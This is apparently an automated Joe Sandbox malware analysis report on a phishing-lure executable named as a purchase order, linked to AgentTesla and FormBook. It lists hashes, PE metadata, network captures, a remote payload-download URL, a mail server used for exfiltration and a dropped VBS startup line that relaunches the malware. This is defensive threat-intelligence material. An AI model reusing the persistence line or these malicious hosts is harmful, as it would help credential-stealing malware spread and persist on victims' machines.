                                http://crl.micropowershell.exe, 0000000A.00000002.1288066510.0000000000631000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.1288991396.0000000004731000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/11564914/23354;purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://stackoverflow.com/q/2152978/23354purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://mail.iaa-airferight.comInstallUtil.exe, 0000000D.00000002.1580815664.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2387668752.0000000002E46000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/mgravell/protobuf-netpurchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://196.251.83.222/win32/panel/uploads/Xqmvapt.wav/Invalidpurchase order T&B19-20PO128.exe, ofg.exe.0.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepurchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.0000000002511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1288991396.0000000004731000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1630701486.00000000027A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://196.251.83.222purchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.0000000002511000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1630701486.00000000027A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                46.175.148.58
                                                mail.iaa-airferight.comUkraine
                                                56394ASLAGIDKOM-NETUAfalse
                                                196.251.83.222
                                                unknownSeychelles
                                                37417SONIC-WirelessZAfalse
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1637288
                                                Start date and time:2025-03-13 13:57:13 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 22s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:28
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:purchase order T&B19-20PO128.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winEXE@31/6@1/2
                                                EGA Information:
                                                • Successful, ratio: 60%
                                                HCA Information:
                                                • Successful, ratio: 97%
                                                • Number of executed functions: 237
                                                • Number of non-executed functions: 11
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50
                                                • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target InstallUtil.exe, PID 2072 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 5344 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                TimeTypeDescription
                                                08:58:27API Interceptor361x Sleep call for process: InstallUtil.exe modified
                                                12:58:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                46.175.148.58SecuriteInfo.com.Win32.CrypterX-gen.25378.7586.exeGet hashmaliciousAgentTeslaBrowse
                                                  T&S-WAN FUNG GMT FTY LTD (CW0007)-Statement as at 28 Feb 2025.exeGet hashmaliciousAgentTeslaBrowse
                                                    Global e-Banking Payment Advice 000000164.exeGet hashmaliciousAgentTeslaBrowse
                                                      Wire Remittance Detail.exeGet hashmaliciousAgentTeslaBrowse
                                                        SecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exeGet hashmaliciousAgentTeslaBrowse
                                                          pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            G3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                  wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                    196.251.83.222SecuriteInfo.com.Win32.CrypterX-gen.25378.7586.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Snscs.dat
                                                                    Global e-Banking Payment Advice 000000164.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Yivwjvmthxz.vdf
                                                                    P.Order request for quotations.exeGet hashmaliciousFormBookBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Gdugwwjztt.pdf
                                                                    PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Rymwg.wav
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Ygjeuyjzlk.dat
                                                                    wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Tcgoaq.mp3
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Frxwibj.mp4
                                                                    PO 352995.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Ooievvpetbc.wav
                                                                    DHL - OVERDUE ACCOUNT LETTER- FINAL REMINDER - 1300711528 XLS.exeGet hashmaliciousFormBookBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Aqyswxq.pdf
                                                                    Bulk_OrderSheet_KIDO VINH.com.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 196.251.83.222/win32/panel/uploads/Wcruip.dat
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    mail.iaa-airferight.comSecuriteInfo.com.Win32.CrypterX-gen.25378.7586.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    T&S-WAN FUNG GMT FTY LTD (CW0007)-Statement as at 28 Feb 2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    Global e-Banking Payment Advice 000000164.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    Wire Remittance Detail.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    G3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    ASLAGIDKOM-NETUASecuriteInfo.com.Win32.CrypterX-gen.25378.7586.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    T&S-WAN FUNG GMT FTY LTD (CW0007)-Statement as at 28 Feb 2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    Global e-Banking Payment Advice 000000164.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    Wire Remittance Detail.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    G3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    SONIC-WirelessZASecuriteInfo.com.Win32.CrypterX-gen.25378.7586.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 196.251.83.222
                                                                    demon.arm.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    demon.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    demon.x86.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    demon.x86.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    demon.mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    demon.arm.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    demon.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    demon.arm.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    demon.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 196.251.81.246
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.7307872139132228
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlllul4/X:NllU4/
                                                                    MD5:3C34689C4BD27F7A51A67BBD54FA65C2
                                                                    SHA1:E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735
                                                                    SHA-256:4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546
                                                                    SHA-512:02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766
                                                                    Malicious:false
                                                                    Preview:@...e.................................,.........................
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\user\Desktop\purchase order T&B19-20PO128.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):78
                                                                    Entropy (8bit):4.745159071587663
                                                                    Encrypted:false
                                                                    SSDEEP:3:FER/n0eFHHot+kiEaKC5vkkHn:FER/lFHIwknaZ5vkO
                                                                    MD5:04D06EFAE12EF8F47F16AC9322E7FF7F
                                                                    SHA1:00E2E0D197B2B9FF448B370FF7CB4C4C2FF38FAA
                                                                    SHA-256:2DD70CE4BB888EF28EBF2226ECF8461E26C2D0B011F19BDC1BB6A8BB60C80B57
                                                                    SHA-512:0ED4134C5417C6FF72791E2C7F5EF537F9ED69AB7D7C67036AD146EAF324F82275C68A18FD1F2387E3D2DEBF8251170D52C195F5DEEA658C2E183082DE5B6154
                                                                    Malicious:true
                                                                    Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\ofg.exe"""
                                                                    Process:C:\Users\user\Desktop\purchase order T&B19-20PO128.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):335984
                                                                    Entropy (8bit):5.565237513664797
                                                                    Encrypted:false
                                                                    SSDEEP:3072:UIoPRXdTO0jWZP2WBOfC2H6izzI//TjLZnzCOFsvPnnWTis2QH3G:boPRXdTOgWZP2WQKJIc/lnW8wPYB
                                                                    MD5:55591F3ECBC94B72A676C291E52162D3
                                                                    SHA1:281EA790D893650B6C8D556E30B6CC95D4DFC3F1
                                                                    SHA-256:A9AD45025DCD9E6CF6B61668033310FD7F72AED9CD5193CC9DFF7DFEC56ECD61
                                                                    SHA-512:7844B2557D13484F9B3BE9470199DD578B683B62F8ED604B599B9416BDF11E8041B03AA148B03F77F2861EAB3FB0AE2AB50B0CF0939E7AC73D6D0309772C0B20
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................*... ...@....@.. .......................`............`.................................`*..K....@..................p&...@....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......@......................@..B.................*......H.......d....2...........................................................*...(....*..0.......... ........8........E....j...?...2.......8e.....|......(...+ ....~....{....:....& ....8......|....(....*..(....}.... ....~....{....:....& ....8.......}.... ....8o.....0..{....... ........8........E....W...1.......8R....(....o...... ....~....{....:....& ....8......(.... ....~....{....9....& ....8....*.&~.......*...~....*..0..7.........(....}.......}.......}......|......(...+..|....(..
                                                                    Process:C:\Users\user\Desktop\purchase order T&B19-20PO128.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.565237513664797
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:purchase order T&B19-20PO128.exe
                                                                    File size:335'984 bytes
                                                                    MD5:55591f3ecbc94b72a676c291e52162d3
                                                                    SHA1:281ea790d893650b6c8d556e30b6cc95d4dfc3f1
                                                                    SHA256:a9ad45025dcd9e6cf6b61668033310fd7f72aed9cd5193cc9dff7dfec56ecd61
                                                                    SHA512:7844b2557d13484f9b3be9470199dd578b683b62f8ed604b599b9416bdf11e8041b03aa148b03f77f2861eab3fb0ae2ab50b0cf0939e7ac73d6d0309772c0b20
                                                                    SSDEEP:3072:UIoPRXdTO0jWZP2WBOfC2H6izzI//TjLZnzCOFsvPnnWTis2QH3G:boPRXdTOgWZP2WQKJIc/lnW8wPYB
                                                                    TLSH:6064C4092E55A013C54BC6F5BFC2C1B0C674A843AF529FFA259AF277053E32D48D19BA
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................*... ...@....@.. .......................`............`................................
                                                                    Icon Hash:f0ccd4f4a8aad468
                                                                    Entrypoint:0x422aae
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x67D217AB [Wed Mar 12 23:24:27 2025 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=DigiCert Global G3 Code Signing ECC SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                    Error Number:-2146869232
                                                                    Not Before, Not After
                                                                    • 12/01/2024 00:00:00 07/01/2026 23:59:59
                                                                    Subject Chain
                                                                    • CN="MobiSystems, Inc.", O="MobiSystems, Inc.", L=San Diego, S=California, C=US, SERIALNUMBER=2286585, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                    Version:3
                                                                    Thumbprint MD5:868795E029573E70790F1E38DDA14AF2
                                                                    Thumbprint SHA-1:D2E1C20F4445F5A6DFE1AEA9B8C3615904C16FEE
                                                                    Thumbprint SHA-256:4EC60DC5555F48F8F1FAC3E59654F6433CB4EF67845A71042095508672A8F718
                                                                    Serial:07C6E784C7A0D2067C26170ACB6B2476
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x22a600x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x2e8a4.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x4fa000x2670.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x540000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x20ab40x20c00c110bfb70de84f5f2f5f671834058ef9False0.42759273616412213data5.79815245876141IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x240000x2e8a40x2ea004b0ed31980a07b42f68f88a11e64f9ccFalse0.26973022788203754data4.735216668770332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x540000xc0x20038ed54623c8a64b6e4862d822a8592c1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x242b00x68a5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9964537683377506
                                                                    RT_ICON0x2ab580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.10422335265586183
                                                                    RT_ICON0x3b3800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.1386640739962161
                                                                    RT_ICON0x448280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.15970425138632163
                                                                    RT_ICON0x49cb00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.16686348606518658
                                                                    RT_ICON0x4ded80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.21846473029045643
                                                                    RT_ICON0x504800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.4155722326454034
                                                                    RT_ICON0x515280x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.35737704918032787
                                                                    RT_ICON0x51eb00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.5274822695035462
                                                                    RT_GROUP_ICON0x523180x84data0.7272727272727273
                                                                    RT_VERSION0x5239c0x31cdata0.43090452261306533
                                                                    RT_MANIFEST0x526b80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain
                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    Comments
                                                                    CompanyName
                                                                    FileDescriptionCugsqgugi
                                                                    FileVersion1.0.0.0
                                                                    InternalNameCugsqgugi.exe
                                                                    LegalCopyrightCopyright 2018
                                                                    LegalTrademarks
                                                                    OriginalFilenameCugsqgugi.exe
                                                                    ProductNameCugsqgugi
                                                                    ProductVersion1.0.0.0
                                                                    Assembly Version1.0.0.0
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 13, 2025 13:58:06.198278904 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:06.203073978 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:06.203146935 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:06.203880072 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:06.208548069 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:06.886415005 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:06.886437893 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:06.886454105 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:06.886468887 CET8049720196.251.83.222192.168.2.4
